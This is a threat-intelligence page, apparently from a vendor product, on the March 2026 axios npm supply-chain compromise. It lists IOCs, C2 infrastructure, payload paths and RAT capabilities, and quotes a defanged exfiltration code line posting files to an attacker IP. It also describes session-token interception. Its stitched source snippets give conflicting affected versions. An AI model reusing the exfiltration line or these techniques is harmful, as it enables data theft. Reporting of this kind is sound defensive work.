axios is the legitimate npm JavaScript HTTP client package that was compromised in a March 31, 2026 software supply-chain attack. Malicious versions axios@1.14.1 and axios@0.30.4 were published after an attacker hijacked maintainer Jason Saayman’s npm account; some reporting also references 1.8.2 and 1.8.3 as malicious versions, but the strongest repeated reporting in the provided content identifies 1.14.1 and 0.30.4. The attacker did not modify axios source directly, but added a malicious dependency, plain-crypto-js@4.2.1, whose postinstall script executed an obfuscated setup.js dropper. That dropper contacted command-and-control infrastructure at sfrclak.com:8000 (142.11.206.73) and downloaded platform-specific remote access trojan payloads for macOS, Windows, and Linux. Reported payload paths and behaviors include /Library/Caches/com.apple.act.mond on macOS, /tmp/ld.py on Linux, and PowerShell/VBScript-based execution on Windows, including persistence via the HKCU\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftUpdate registry key. Reported RAT capabilities include reconnaissance, recurring host beacons, file and directory enumeration, arbitrary code execution, and commands such as kill, peinject, runscript, and rundir. Anti-forensics behavior included deleting setup.js and package.json and replacing artifacts to hide execution. The compromise affected the real axios package rather than a typosquat, creating broad downstream risk because axios is a heavily used direct and transitive dependency in the JavaScript ecosystem. The content associates the incident with a supply-chain campaign attributed in one source to UNC1069, but the provided material does not include technical evidence sufficient to confirm that attribution. High-confidence IOCs mentioned in the content include axios@1.14.1, axios@0.30.4, plain-crypto-js@4.2.1, sfrclak.com, 142.11.206.73:8000, /tmp/ld.py, /Library/Caches/com.apple.act.mond, and the Windows Run key MicrosoftUpdate.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
"Axios npm Backdoored: UNC1069 Deploys Cross-Platform RAT via Supply Chain Attack"
14 distinct techniques documented for this family, organized by ATT&CK tactic.
Attackers exploited the lead maintainer’s compromised credentials to publish malicious versions of the library
The more pressing concern is the fallout from the Axios supply chain attack, as users who installed or updated Claude Code via npm on March 31, 2026, between 00:21 and 03:29 UTC may have pulled with it a trojanized version of the HTTP client that contains a cross-platform remote access trojan.
Operation DangerousPassword... led to the compromise of the widely used JavaScript library axios... Attackers exploited the lead maintainer’s compromised credentials to publish malicious versions of the library that injected trojanized code into affected systems
When the victim signs in, the attacker intercepts both the session cookie and the OAuth access token — and since these represent a fully authenticated session, they can be reused to access Microsoft services without any further credential check or MFA challenge.
Data is exfiltrated to port 8085... Interesting files are exfiltrated via port 8086... All HTTP communications are performed via the Axios NPM package: const response = await axios.post(`" + "hxxp://216[.]126[.]225[.]243:8086/upload" + "`, form, { ...
7 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
7 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
The content suggests Axios was backdoored in an npm supply chain attack and used to deploy a cross-platform RAT.
The content describes malicious npm-published versions 1.8.2 and 1.8.3 of Axios that included a hidden dependency used to install a remote access trojan across macOS, Windows, and Linux systems as part of a supply-chain compromise.
A widely used JavaScript library whose maliciously published npm versions 1.14.1 and 0.30.4 introduced a dependency that executed a postinstall script to drop a remote access trojan and then removed traces of the installation activity.
The content describes a supply-chain compromise involving the Axios npm package, where a remote-access trojan was injected into specific package versions.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.